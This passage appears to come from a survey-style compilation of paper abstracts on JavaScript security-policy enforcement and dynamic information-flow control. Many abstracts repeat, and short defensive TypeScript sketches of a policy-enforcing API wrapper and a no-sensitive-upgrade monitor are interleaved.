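    console.log(`policy violation on ${e.kind}: execution truncated`);
    break;
  }
}
```

An edit automaton differs only in what the step function may do: instead of a yes/no answer, it can rewrite the event stream by suppressing the offending action or inserting compensating ones, which is the additional power studied in the edit-automata work above.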
--- paper_title: Enforceable security policies paper_content: A precise characterization is given for the class of security policies that can be enforced using mechanisms that work by monitoring system execution, and a class of automata is introduced for specifying those security policies. Techniques to enforce security policies specified by such automata are also discussed. READERS NOTE: A substantially revised version of this document is available at http://cs-tr.cs.cornell.edu:80/Dienst/UI/1.0/Display/ncstrl.cornell/TR99-1759 --- paper_title: Run-Time Enforcement of Nonsafety Policies paper_content: A common mechanism for ensuring that software behaves securely is to monitor programs at run time and check that they dynamically adhere to constraints specified by a security policy. Whenever a program monitor detects that untrusted software is attempting to execute a dangerous action, it takes remedial steps to ensure that only safe code actually gets executed. This article improves our understanding of the space of policies enforceable by monitoring the run-time behaviors of programs. We begin by building a formal framework for analyzing policy enforcement: we precisely define policies, monitors, and enforcement. This framework allows us to prove that monitors enforce an interesting set of policies that we call the infinite renewal properties. We show how to construct a program monitor that provably enforces any reasonable infinite renewal property. We also show that the set of infinite renewal properties includes some nonsafety policies, that is, that monitors can enforce some nonsafety (including some purely liveness) policies. Finally, we demonstrate concrete examples of nonsafety policies enforceable by practical run-time monitors. --- paper_title: A Sound Type System For Secure Flow Analysis paper_content: Ensuring secure information flow within programs in the context of multiple sensitivity levels has been widely studied. Especially noteworthy is Denning’s work in secure flow analysis and the lattice model [6][7]. Until now, however, the soundness of Denning’s analysis has not been established satisfactorily. We formulate Denning’s approach as a type system and present a notion of soundness for the system that can be viewed as a form of noninterference. Soundness is established by proving, with respect to a standard programming language semantics, that all well-typed programs have this noninterference property. --- paper_title: Detecting malicious JavaScript code in Mozilla paper_content: The JavaScript language is used to enhance the client-side display of web pages. JavaScript code is downloaded into browsers and executed on-the-fly by an embedded interpreter. Browsers provide sand-boxing mechanisms to prevent JavaScript code from compromising the security of the client's environment, but, unfortunately, a number of attacks exist that can be used to steal users' credentials (e.g., cross-site scripting attacks) and lure users into providing sensitive information to unauthorized parties (e.g., phishing attacks). We propose an approach to solve this problem that is based on monitoring JavaScript code execution and comparing the execution to high-level policies, to detect malicious code behavior. To achieve this goal it is necessary to provide a mechanism to audit the execution of JavaScript code. This is a difficult task, because of the close integration of JavaScript with complex browser applications, such as Mozilla. 
This paper presents the first existing implementation of an auditing system for JavaScript interpreters and discusses the pitfalls and lessons learned in developing the auditing mechanism. --- paper_title: Edit automata: enforcement mechanisms for run-time security policies paper_content: We analyze the space of security policies that can be enforced by monitoring and modifying programs at run time. Our program monitors, called edit automata, are abstract machines that examine the sequence of application program actions and transform the sequence when it deviates from a specified policy. Edit automata have a rich set of transformational powers: they may terminate an application, thereby truncating the program action stream; they may suppress undesired or dangerous actions without necessarily terminating the program; and they may also insert additional actions into the event stream. ::: ::: After providing a formal definition of edit automata, we develop a rigorous framework for reasoning about them and their cousins: truncation automata (which can only terminate applications), suppression automata (which can terminate applications and suppress individual actions), and insertion automata (which can terminate and insert). We give a set-theoretic characterization of the policies each sort of automaton can enforce, and we provide examples of policies that can be enforced by one sort of automaton but not another. --- paper_title: JavaScript instrumentation for browser security paper_content: It is well recognized that JavaScript can be exploited to launch browser-based security attacks. We propose to battle such attacks using program instrumentation. Untrusted JavaScript code goes through a rewriting process which identifies relevant operations, modifies questionable behaviors, and prompts the user (a web page viewer) for decisions on how to proceed when appropriate. Our solution is parametric with respect to the security policy-the policy is implemented separately from the rewriting, and the same rewriting process is carried out regardless of which policy is in use. Be-sides providing a rigorous account of the correctness of our solution, we also discuss practical issues including policy management and prototype experiments. A useful by-product of our work is an operational semantics of a core subset of JavaScript, where code embedded in (HTML) documents may generate further document pieces (with new code embedded) at runtime, yielding a form of self-modifying code. --- paper_title: Lightweight self-protecting JavaScript paper_content: This paper introduces a method to control JavaScript execution. The aim is to prevent or modify inappropriate behaviour caused by e.g. malicious injected scripts or poorly designed third-party code. The approach is based on modifying the code so as to make it self-protecting: the protection mechanism (security policy) is embedded into the code itself and intercepts security relevant API calls. The challenges come from the nature of the JavaScript language: any variables in the scope of the program can be redefined, and code can be created and run on-the-fly. This creates potential problems, respectively, for tamper-proofing the protection mechanism, and for ensuring that no security relevant events bypass the protection. 
Unlike previous approaches to instrument and monitor JavaScript to enforce or adjust behaviour, the solution we propose is lightweight in that (i) it does not require a modified browser, and (ii) it does not require any run-time parsing and transformation of code (including dynamically generated code). As a result, the method has low run-time overhead compared to other methods satisfying (i), and the lack of need for browser modifications means that the policy can even be applied on the server to mitigate some effects of cross-site scripting bugs. --- paper_title: Detecting malicious JavaScript code in Mozilla paper_content: The JavaScript language is used to enhance the client-side display of web pages. JavaScript code is downloaded into browsers and executed on-the-fly by an embedded interpreter. Browsers provide sand-boxing mechanisms to prevent JavaScript code from compromising the security of the client's environment, but, unfortunately, a number of attacks exist that can be used to steal users' credentials (e.g., cross-site scripting attacks) and lure users into providing sensitive information to unauthorized parties (e.g., phishing attacks). We propose an approach to solve this problem that is based on monitoring JavaScript code execution and comparing the execution to high-level policies, to detect malicious code behavior. To achieve this goal it is necessary to provide a mechanism to audit the execution of JavaScript code. This is a difficult task, because of the close integration of JavaScript with complex browser applications, such as Mozilla. This paper presents the first existing implementation of an auditing system for JavaScript interpreters and discusses the pitfalls and lessons learned in developing the auditing mechanism. --- paper_title: Lightweight self-protecting JavaScript paper_content: This paper introduces a method to control JavaScript execution. The aim is to prevent or modify inappropriate behaviour caused by e.g. malicious injected scripts or poorly designed third-party code. The approach is based on modifying the code so as to make it self-protecting: the protection mechanism (security policy) is embedded into the code itself and intercepts security relevant API calls. The challenges come from the nature of the JavaScript language: any variables in the scope of the program can be redefined, and code can be created and run on-the-fly. This creates potential problems, respectively, for tamper-proofing the protection mechanism, and for ensuring that no security relevant events bypass the protection. Unlike previous approaches to instrument and monitor JavaScript to enforce or adjust behaviour, the solution we propose is lightweight in that (i) it does not require a modified browser, and (ii) it does not require any run-time parsing and transformation of code (including dynamically generated code). As a result, the method has low run-time overhead compared to other methods satisfying (i), and the lack of need for browser modifications means that the policy can even be applied on the server to mitigate some effects of cross-site scripting bugs. --- paper_title: I.: Javascript instrumentation in practice paper_content: JavaScript has been exploited to launch various browser-based attacks. Our previous work proposed a theoretical framework applying policy-based code instrumentation to JavaScript. This paper further reports our experience carrying out the theory in practice. 
Specifically, we discuss how the instrumentation is performed on various JavaScript and HTML syntactic constructs, present a new policy construction method for facilitating the creation and compilation of security policies, and document various practical difficulties arose during our prototyping. Our prototype currently works with several different web browsers, including Safari Mobile running on iPhones. We report our results based on experiments using representative real-world web applications --- paper_title: WebJail: least-privilege integration of third-party components in web mashups paper_content: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, can not be implemented using the current integration techniques, without ownership over the component's code. We propose WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML 5 JavaScript APIs, and full mediation is achieved via the use of deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0, and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load-time (7ms), and the execution overhead in case of sensitive operations (0.1ms). --- paper_title: ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser paper_content: Much of the power of modern Web comes from the ability of a Web page to combine content and JavaScript code from disparate servers on the same page. While the ability to create such mash-ups is attractive for both the user and the developer because of extra functionality, code inclusion effectively opens the hosting site up for attacks and poor programming practices within every JavaScript library or API it chooses to use. In other words, expressiveness comes at the price of losing control. To regain the control, it is therefore valuable to provide means for the hosting page to restrict the behavior of the code that the page may include. This paper presents ConScript, a client-side advice implementation for security, built on top of Internet Explorer 8. ConScript allows the hosting page to express fine-grained application-specific security policies that are enforced at runtime. In addition to presenting 17 widely-ranging security and reliability policies that ConScript enables, we also show how policies can be generated automatically through static analysis of server-side code or runtime analysis of client-side code. 
We also present a type system that helps ensure correctness of ConScript policies. To show the practicality of ConScript in a range of settings, we compare the overhead of ConScript enforcement and conclude that it is significantly lower than that of other systems proposed in the literature, both on micro-benchmarks as well as large, widely-used applications such as MSN, GMail, Google Maps, and Live Desktop. --- paper_title: Lightweight self-protecting JavaScript paper_content: This paper introduces a method to control JavaScript execution. The aim is to prevent or modify inappropriate behaviour caused by e.g. malicious injected scripts or poorly designed third-party code. The approach is based on modifying the code so as to make it self-protecting: the protection mechanism (security policy) is embedded into the code itself and intercepts security relevant API calls. The challenges come from the nature of the JavaScript language: any variables in the scope of the program can be redefined, and code can be created and run on-the-fly. This creates potential problems, respectively, for tamper-proofing the protection mechanism, and for ensuring that no security relevant events bypass the protection. Unlike previous approaches to instrument and monitor JavaScript to enforce or adjust behaviour, the solution we propose is lightweight in that (i) it does not require a modified browser, and (ii) it does not require any run-time parsing and transformation of code (including dynamically generated code). As a result, the method has low run-time overhead compared to other methods satisfying (i), and the lack of need for browser modifications means that the policy can even be applied on the server to mitigate some effects of cross-site scripting bugs. --- paper_title: WebJail: least-privilege integration of third-party components in web mashups paper_content: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, can not be implemented using the current integration techniques, without ownership over the component's code. We propose WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML 5 JavaScript APIs, and full mediation is achieved via the use of deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0, and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load-time (7ms), and the execution overhead in case of sensitive operations (0.1ms). 
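Self-protecting JavaScript, ConScript, and WebJail, discussed above, all build on the same wrapping idea: before any untrusted script runs, each security-relevant API is replaced by a policy-checking wrapper, and the only reference to the original function is kept in a closure that untrusted code cannot reach. The TypeScript sketch below shows the pattern for window.open; the whitelist policy and the choice of API are assumptions for illustration, and a real deployment additionally has to protect the wrapper itself against deletion, prototype tampering, and dynamically generated code, which is where the cited systems differ.

```typescript
// Sketch of the API-wrapping pattern behind self-protecting JavaScript, ConScript, and WebJail.
// The original function is captured in a closure before untrusted code runs, and the visible
// binding is replaced by a policy-enforcing wrapper. Policy contents are illustrative.

type OpenFn = (url?: string | URL, target?: string, features?: string) => Window | null;

function installOpenPolicy(allowedOrigins: string[]): void {
  // Keep the only reference to the real window.open inside this closure.
  const originalOpen: OpenFn = window.open.bind(window);

  const guardedOpen: OpenFn = (url, target, features) => {
    const origin = new URL(String(url ?? ""), window.location.href).origin;
    if (!allowedOrigins.includes(origin)) {
      console.warn(`policy: window.open to ${origin} suppressed`);
      return null; // suppress the action rather than perform it
    }
    return originalOpen(url, target, features);
  };

  // Make the replacement non-writable and non-configurable so a later script
  // cannot simply reassign or delete it (full tamper-proofing needs more care).
  Object.defineProperty(window, "open", {
    value: guardedOpen,
    writable: false,
    configurable: false,
  });
}

// The policy must be installed before any third-party script executes,
// e.g. from an inline script at the top of the page:
installOpenPolicy(["https://www.example.com"]);
```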
--- paper_title: JavaScript instrumentation for browser security paper_content: It is well recognized that JavaScript can be exploited to launch browser-based security attacks. We propose to battle such attacks using program instrumentation. Untrusted JavaScript code goes through a rewriting process which identifies relevant operations, modifies questionable behaviors, and prompts the user (a web page viewer) for decisions on how to proceed when appropriate. Our solution is parametric with respect to the security policy-the policy is implemented separately from the rewriting, and the same rewriting process is carried out regardless of which policy is in use. Be-sides providing a rigorous account of the correctness of our solution, we also discuss practical issues including policy management and prototype experiments. A useful by-product of our work is an operational semantics of a core subset of JavaScript, where code embedded in (HTML) documents may generate further document pieces (with new code embedded) at runtime, yielding a form of self-modifying code. --- paper_title: Efficient purely-dynamic information flow analysis paper_content: We present a novel approach for efficiently tracking information flow in a dynamically-typed language such as JavaScript. Our approach is purely dynamic, and it detects problems with implicit paths via a dynamic check that avoids the need for an approximate static analyses while still guaranteeing non-interference. We incorporate this check into an efficient evaluation strategy based on sparse information labeling that leaves information flow labels implicit whenever possible, and introduces explicit labels only for values that migrate between security domains. We present experimental results showing that, on a range of small benchmark programs, sparse labeling provides a substantial (30%-50%) speed-up over universal labeling. --- paper_title: Lightweight self-protecting JavaScript paper_content: This paper introduces a method to control JavaScript execution. The aim is to prevent or modify inappropriate behaviour caused by e.g. malicious injected scripts or poorly designed third-party code. The approach is based on modifying the code so as to make it self-protecting: the protection mechanism (security policy) is embedded into the code itself and intercepts security relevant API calls. The challenges come from the nature of the JavaScript language: any variables in the scope of the program can be redefined, and code can be created and run on-the-fly. This creates potential problems, respectively, for tamper-proofing the protection mechanism, and for ensuring that no security relevant events bypass the protection. Unlike previous approaches to instrument and monitor JavaScript to enforce or adjust behaviour, the solution we propose is lightweight in that (i) it does not require a modified browser, and (ii) it does not require any run-time parsing and transformation of code (including dynamically generated code). As a result, the method has low run-time overhead compared to other methods satisfying (i), and the lack of need for browser modifications means that the policy can even be applied on the server to mitigate some effects of cross-site scripting bugs. --- paper_title: Information-Flow Security for a Core of JavaScript paper_content: Tracking information flow in dynamic languages remains an important and intricate problem. This paper makes substantial headway toward understanding the main challenges and resolving them. 
We identify language constructs that constitute a core of Java Script: objects, higher-order functions, exceptions, and dynamic code evaluation. The core is powerful enough to naturally encode native constructs as arrays, as well as functionalities of Java Script's API from the document object model (DOM) related to document tree manipulation and event processing. As the main contribution, we develop a dynamic type system that guarantees information-flow security for this language. --- paper_title: FlowFox: a web browser with flexible and precise information flow control paper_content: We present FlowFox, the first fully functional web browser that implements a precise and general information flow control mechanism for web scripts based on the technique of secure multi-execution. We demonstrate how FlowFox subsumes many ad-hoc script containment countermeasures developed over the last years. We also show that FlowFox is compatible with the current web, by investigating its behavior on the Alexa top-500 web sites, many of which make intricate use of JavaScript. The performance and memory cost of FlowFox is substantial (a performance cost of around 20% on macro benchmarks for a simple two level policy), but not prohibitive. Our prototype implementation shows that information flow enforcement based on secure multi-execution can be implemented in full-scale browsers. It can support powerful, yet precise policies refining the same-origin-policy in a way that is compatible with existing websites. --- paper_title: Staged information flow for javascript paper_content: Modern websites are powered by JavaScript, a flexible dynamic scripting language that executes in client browsers. A common paradigm in such websites is to include third-party JavaScript code in the form of libraries or advertisements. If this code were malicious, it could read sensitive information from the page or write to the location bar, thus redirecting the user to a malicious page, from which the entire machine could be compromised. We present an information-flow based approach for inferring the effects that a piece of JavaScript has on the website in order to ensure that key security properties are not violated. To handle dynamically loaded and generated JavaScript, we propose a framework for staging information flow properties. Our framework propagates information flow through the currently known code in order to compute a minimal set of syntactic residual checks that are performed on the remaining code when it is dynamically loaded. We have implemented a prototype framework for staging information flow. We describe our techniques for handling some difficult features of JavaScript and evaluate our system's performance on a variety of large real-world websites. Our experiments show that static information flow is feasible and efficient for JavaScript, and that our technique allows the enforcement of information-flow policies with almost no run-time overhead. --- paper_title: Permissive dynamic information flow analysis paper_content: A key challenge in dynamic information flow analysis is handling implicit flows, where code conditional on a private variable updates a public variable x. The naive approach of upgrading x to private results in x being partially leaked, where its value contains private data but its label might remain public on an alternative execution (where the conditional update was not performed). 
Prior work proposed the no-sensitive-upgrade check, which handles implicit flows by prohibiting partially leaked data, but attempts to update a public variable from a private context causes execution to get stuck. To overcome this limitation, we develop a sound yet flexible permissive-upgrade strategy. To prevent information leaks, partially leaked data is permitted but carefully tracked to ensure that it is never totally leaked. This permissive-upgrade strategy is more flexible than the prior approaches such as the no-sensitive-upgrade check. Under the permissive-upgrade strategy, partially leaked data must be marked as private before being used in a conditional test, thereby ensuring that it is private for both the current execution as well as alternate execution paths. This paper also presents a dynamic analysis technique for inferring these privatization operations and inserting them into the program source code. The combination of these techniques allows more programs to run to completion, while still guaranteeing termination-insensitive non-interference in a purely dynamic manner. --- paper_title: JavaScript instrumentation for browser security paper_content: It is well recognized that JavaScript can be exploited to launch browser-based security attacks. We propose to battle such attacks using program instrumentation. Untrusted JavaScript code goes through a rewriting process which identifies relevant operations, modifies questionable behaviors, and prompts the user (a web page viewer) for decisions on how to proceed when appropriate. Our solution is parametric with respect to the security policy-the policy is implemented separately from the rewriting, and the same rewriting process is carried out regardless of which policy is in use. Be-sides providing a rigorous account of the correctness of our solution, we also discuss practical issues including policy management and prototype experiments. A useful by-product of our work is an operational semantics of a core subset of JavaScript, where code embedded in (HTML) documents may generate further document pieces (with new code embedded) at runtime, yielding a form of self-modifying code. --- paper_title: ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser paper_content: Much of the power of modern Web comes from the ability of a Web page to combine content and JavaScript code from disparate servers on the same page. While the ability to create such mash-ups is attractive for both the user and the developer because of extra functionality, code inclusion effectively opens the hosting site up for attacks and poor programming practices within every JavaScript library or API it chooses to use. In other words, expressiveness comes at the price of losing control. To regain the control, it is therefore valuable to provide means for the hosting page to restrict the behavior of the code that the page may include. This paper presents ConScript, a client-side advice implementation for security, built on top of Internet Explorer 8. ConScript allows the hosting page to express fine-grained application-specific security policies that are enforced at runtime. In addition to presenting 17 widely-ranging security and reliability policies that ConScript enables, we also show how policies can be generated automatically through static analysis of server-side code or runtime analysis of client-side code. We also present a type system that helps ensure correctness of ConScript policies. 
To show the practicality of ConScript in a range of settings, we compare the overhead of ConScript enforcement and conclude that it is significantly lower than that of other systems proposed in the literature, both on micro-benchmarks as well as large, widely-used applications such as MSN, GMail, Google Maps, and Live Desktop. --- paper_title: Multiple facets for dynamic information flow paper_content: JavaScript has become a central technology of the web, but it is also the source of many security problems, including cross-site scripting attacks and malicious advertising code. Central to these problems is the fact that code from untrusted sources runs with full privileges. We implement information flow controls in Firefox to help prevent violations of data confidentiality and integrity. Most previous information flow techniques have primarily relied on either static type systems, which are a poor fit for JavaScript, or on dynamic analyses that sometimes get stuck due to problematic implicit flows, even in situations where the target web application correctly satisfies the desired security policy. We introduce faceted values, a new mechanism for providing information flow security in a dynamic manner that overcomes these limitations. Taking inspiration from secure multi-execution, we use faceted values to simultaneously and efficiently simulate multiple executions for different security levels, thus providing non-interference with minimal overhead, and without the reliance on the stuck executions of prior dynamic approaches. --- paper_title: Cross Site Scripting Prevention with Dynamic Data Tainting and Static Analysis paper_content: Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). Currently, most approaches attempt to prevent XSS on the server side by inspecting and modifying the data that is exchanged between the web application and the user. Unfortunately, it is often the case that vulnerable applications are not fixed for a considerable amount of time, leaving the users vulnerable to attacks. The solution presented in this paper stops XSS attacks on the client side by tracking the flow of sensitive information inside the web browser. If sensitive information is about to be transferred to a third party, the user can decide if this should be permitted or not. As a result, the user has an additional protection layer when surfing the web, without solely depending on the security of the web application. --- paper_title: Detecting malicious JavaScript code in Mozilla paper_content: The JavaScript language is used to enhance the client-side display of web pages. JavaScript code is downloaded into browsers and executed on-the-fly by an embedded interpreter. Browsers provide sand-boxing mechanisms to prevent JavaScript code from compromising the security of the client's environment, but, unfortunately, a number of attacks exist that can be used to steal users' credentials (e.g., cross-site scripting attacks) and lure users into providing sensitive information to unauthorized parties (e.g., phishing attacks). We propose an approach to solve this problem that is based on monitoring JavaScript code execution and comparing the execution to high-level policies, to detect malicious code behavior. 
To achieve this goal it is necessary to provide a mechanism to audit the execution of JavaScript code. This is a difficult task, because of the close integration of JavaScript with complex browser applications, such as Mozilla. This paper presents the first existing implementation of an auditing system for JavaScript interpreters and discusses the pitfalls and lessons learned in developing the auditing mechanism. --- paper_title: Efficient purely-dynamic information flow analysis paper_content: We present a novel approach for efficiently tracking information flow in a dynamically-typed language such as JavaScript. Our approach is purely dynamic, and it detects problems with implicit paths via a dynamic check that avoids the need for an approximate static analyses while still guaranteeing non-interference. We incorporate this check into an efficient evaluation strategy based on sparse information labeling that leaves information flow labels implicit whenever possible, and introduces explicit labels only for values that migrate between security domains. We present experimental results showing that, on a range of small benchmark programs, sparse labeling provides a substantial (30%-50%) speed-up over universal labeling. --- paper_title: Permissive dynamic information flow analysis paper_content: A key challenge in dynamic information flow analysis is handling implicit flows, where code conditional on a private variable updates a public variable x. The naive approach of upgrading x to private results in x being partially leaked, where its value contains private data but its label might remain public on an alternative execution (where the conditional update was not performed). Prior work proposed the no-sensitive-upgrade check, which handles implicit flows by prohibiting partially leaked data, but attempts to update a public variable from a private context causes execution to get stuck. To overcome this limitation, we develop a sound yet flexible permissive-upgrade strategy. To prevent information leaks, partially leaked data is permitted but carefully tracked to ensure that it is never totally leaked. This permissive-upgrade strategy is more flexible than the prior approaches such as the no-sensitive-upgrade check. Under the permissive-upgrade strategy, partially leaked data must be marked as private before being used in a conditional test, thereby ensuring that it is private for both the current execution as well as alternate execution paths. This paper also presents a dynamic analysis technique for inferring these privatization operations and inserting them into the program source code. The combination of these techniques allows more programs to run to completion, while still guaranteeing termination-insensitive non-interference in a purely dynamic manner. --- paper_title: A Sound Type System For Secure Flow Analysis paper_content: Ensuring secure information flow within programs in the context of multiple sensitivity levels has been widely studied. Especially noteworthy is Denning’s work in secure flow analysis and the lattice model [6][7]. Until now, however, the soundness of Denning’s analysis has not been established satisfactorily. We formulate Denning’s approach as a type system and present a notion of soundness for the system that can be viewed as a form of noninterference. Soundness is established by proving, with respect to a standard programming language semantics, that all well-typed programs have this noninterference property. 
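The purely dynamic monitoring approaches summarised above handle implicit flows with the no-sensitive-upgrade (NSU) check. The following TypeScript fragment is a toy model under simplifying assumptions (two labels, an explicit pc stack, a tiny variable store); it is not the monitor of any cited paper, only an illustration of the check itself.

```typescript
// Simplified purely dynamic information-flow monitor with the
// no-sensitive-upgrade (NSU) check: two labels, L (public) and H (secret).

type Label = "L" | "H";
const join = (a: Label, b: Label): Label => (a === "H" || b === "H" ? "H" : "L");

interface LabeledValue { value: number; label: Label; }

class Monitor {
  private store = new Map<string, LabeledValue>();
  private pcStack: Label[] = ["L"]; // label of the current control context

  private pc(): Label { return this.pcStack.reduce(join, "L"); }

  declare(name: string, value: number, label: Label): void {
    this.store.set(name, { value, label });
  }

  read(name: string): LabeledValue {
    const v = this.store.get(name);
    if (!v) throw new Error(`undeclared variable ${name}`);
    return v;
  }

  // x := e  -- NSU: a public variable may not be updated under a secret pc.
  assign(name: string, rhs: LabeledValue): void {
    const target = this.read(name);
    if (this.pc() === "H" && target.label === "L") {
      throw new Error(`NSU violation: cannot update public ${name} in secret context`);
    }
    this.store.set(name, { value: rhs.value, label: join(rhs.label, this.pc()) });
  }

  // if (cond) { body }  -- the branch condition's label is pushed onto the pc.
  branch(cond: LabeledValue, body: () => void): void {
    this.pcStack.push(cond.label);
    try { if (cond.value !== 0) body(); } finally { this.pcStack.pop(); }
  }
}

// The classic implicit-flow example:  if (secret) { leak := 1 }
const m = new Monitor();
m.declare("secret", 1, "H");
m.declare("leak", 0, "L");
try {
  m.branch(m.read("secret"), () => m.assign("leak", { value: 1, label: "L" }));
} catch (e) {
  console.log((e as Error).message); // execution is stopped instead of leaking
}
```

The permissive-upgrade strategy described in the abstract above relaxes exactly this check: instead of stopping, it marks the updated variable as partially leaked and only faults if that value later influences a branch or an observable output.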
--- paper_title: Certification of programs for secure information flow paper_content: This paper presents a certification mechanism for verifying the secure flow of information through a program. Because it exploits the properties of a lattice structure among security classes, the procedure is sufficiently simple that it can easily be included in the analysis phase of most existing compilers. Appropriate semantics are presented and proved correct. An important application is the confinement problem: The mechanism can prove that a program cannot cause supposedly nonconfidential results to depend on confidential input data. --- paper_title: Confidentiality Enforcement Using Dynamic Information Flow Analyses paper_content: With the intensification of communication in information systems, interest in security has increased. The notion of noninterference is typically used as a baseline security policy to formalize confidentiality of secret information manipulated by a program. This notion, based on ideas from classical information theory, was first introduced by Goguen and Meseguer (1982) as the absence of strong dependency (Cohen, 1977): "information is transmitted from a source to a destination only when variety in the source can be conveyed to the destination" (Cohen, 1977). Building on the notion proposed by Goguen and Meseguer, a program is typically said to be noninterfering if the values of its public outputs do not depend on the values of its secret inputs. If that is not the case then there exist illegal information flows that allow an attacker, having knowledge about the source code of the program, to deduce information about the secret inputs from the public outputs of the execution. In contrast to the vast majority of previous work on noninterference, which is based on static analyses (especially type systems), this PhD thesis report considers dynamic monitoring of noninterference. A monitor enforcing noninterference is more complex than standard execution monitors: "the information carried by a particular message depends on the set it comes from. The information conveyed is not an intrinsic property of the individual message." (Ashby, 1956). The work presented in this report is based on the combination of dynamic and static information flow analyses. The practicality of such an approach is demonstrated by the development of a monitor for concurrent programs including synchronization commands. This report also elaborates on the soundness with regard to noninterference and precision of such approaches. --- paper_title: Dynamic vs. Static Flow-Sensitive Security Analysis paper_content: This paper seeks to answer fundamental questions about trade-offs between static and dynamic security analysis. It has been previously shown that flow-sensitive static information-flow analysis is a natural generalization of flow-insensitive static analysis, which allows accepting more secure programs. It has also been shown that sound purely dynamic information-flow enforcement is more permissive than static analysis in the flow-insensitive case. We argue that the step from flow-insensitive to flow-sensitive is fundamentally limited for purely dynamic information-flow controls. We prove impossibility of a sound purely dynamic information-flow monitor that accepts programs certified by a classical flow-sensitive static analysis. A side implication is impossibility of permissive dynamic instrumented security semantics for information flow, which guides us to uncover an unsound semantics from the literature.
We present a general framework for hybrid mechanisms that is parameterized in the static part and in the reaction method of the enforcement (stop, suppress, or rewrite) and give security guarantees with respect to termination-insensitive noninterference for a simple language with output. --- paper_title: Staged information flow for javascript paper_content: Modern websites are powered by JavaScript, a flexible dynamic scripting language that executes in client browsers. A common paradigm in such websites is to include third-party JavaScript code in the form of libraries or advertisements. If this code were malicious, it could read sensitive information from the page or write to the location bar, thus redirecting the user to a malicious page, from which the entire machine could be compromised. We present an information-flow based approach for inferring the effects that a piece of JavaScript has on the website in order to ensure that key security properties are not violated. To handle dynamically loaded and generated JavaScript, we propose a framework for staging information flow properties. Our framework propagates information flow through the currently known code in order to compute a minimal set of syntactic residual checks that are performed on the remaining code when it is dynamically loaded. We have implemented a prototype framework for staging information flow. We describe our techniques for handling some difficult features of JavaScript and evaluate our system's performance on a variety of large real-world websites. Our experiments show that static information flow is feasible and efficient for JavaScript, and that our technique allows the enforcement of information-flow policies with almost no run-time overhead. --- paper_title: From dynamic to static and back: Riding the roller coaster of information-flow control research paper_content: Historically, dynamic techniques are the pioneers of the area of information flow in the 70's. In their seminal work, Denning and Denning suggest a static alternative for information-flow analysis. Following this work, the 90's see the domination of static techniques for information flow. The common wisdom appears to be that dynamic approaches are not a good match for security since monitoring a single path misses public side effects that could have happened in other paths. Dynamic techniques for information flow are on the rise again, driven by the need for permissiveness in today's dynamic applications. But they still involve nontrivial static checks for leaks related to control flow. ::: ::: This paper demonstrates that it is possible for a purely dynamic enforcement to be as secure as Denning-style static information-flow analysis, despite the common wisdom. We do have the trade-off that static techniques have benefits of reducing runtime overhead, and dynamic techniques have the benefits of permissiveness (this, for example, is of particular importance in dynamic applications, where freshly generated code is evaluated). But on the security side, we show for a simple imperative language that both Denning-style analysis and dynamic enforcement have the same assurance: termination-insensitive noninterference. --- paper_title: On flow-sensitive security types paper_content: This article investigates formal properties of a family of semantically sound flow-sensitive type systems for tracking information flow in simple While programs. 
The family is indexed by the choice of flow lattice. By choosing the flow lattice to be the powerset of program variables, we obtain a system which, in a very strong sense, subsumes all other systems in the family (in particular, for each program, it provides a principal typing from which all others may be inferred). This distinguished system is shown to be equivalent to, though more simply described than, Amtoft and Banerjee's Hoare-style independence logic (SAS'04). In general, some lattices are more expressive than others. Despite this, we show that no type system in the family can give better results for a given choice of lattice than the type system for that lattice itself. Finally, for any program typeable in one of these systems, we show how to construct an equivalent program which is typeable in a simple flow-insensitive system. We argue that this general approach could be useful in a proof-carrying-code setting. --- paper_title: Multiple facets for dynamic information flow paper_content: JavaScript has become a central technology of the web, but it is also the source of many security problems, including cross-site scripting attacks and malicious advertising code. Central to these problems is the fact that code from untrusted sources runs with full privileges. We implement information flow controls in Firefox to help prevent violations of data confidentiality and integrity. Most previous information flow techniques have primarily relied on either static type systems, which are a poor fit for JavaScript, or on dynamic analyses that sometimes get stuck due to problematic implicit flows, even in situations where the target web application correctly satisfies the desired security policy. We introduce faceted values, a new mechanism for providing information flow security in a dynamic manner that overcomes these limitations. Taking inspiration from secure multi-execution, we use faceted values to simultaneously and efficiently simulate multiple executions for different security levels, thus providing non-interference with minimal overhead, and without the reliance on the stuck executions of prior dynamic approaches. --- paper_title: Cross Site Scripting Prevention with Dynamic Data Tainting and Static Analysis paper_content: Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). Currently, most approaches attempt to prevent XSS on the server side by inspecting and modifying the data that is exchanged between the web application and the user. Unfortunately, it is often the case that vulnerable applications are not fixed for a considerable amount of time, leaving the users vulnerable to attacks. The solution presented in this paper stops XSS attacks on the client side by tracking the flow of sensitive information inside the web browser. If sensitive information is about to be transferred to a third party, the user can decide if this should be permitted or 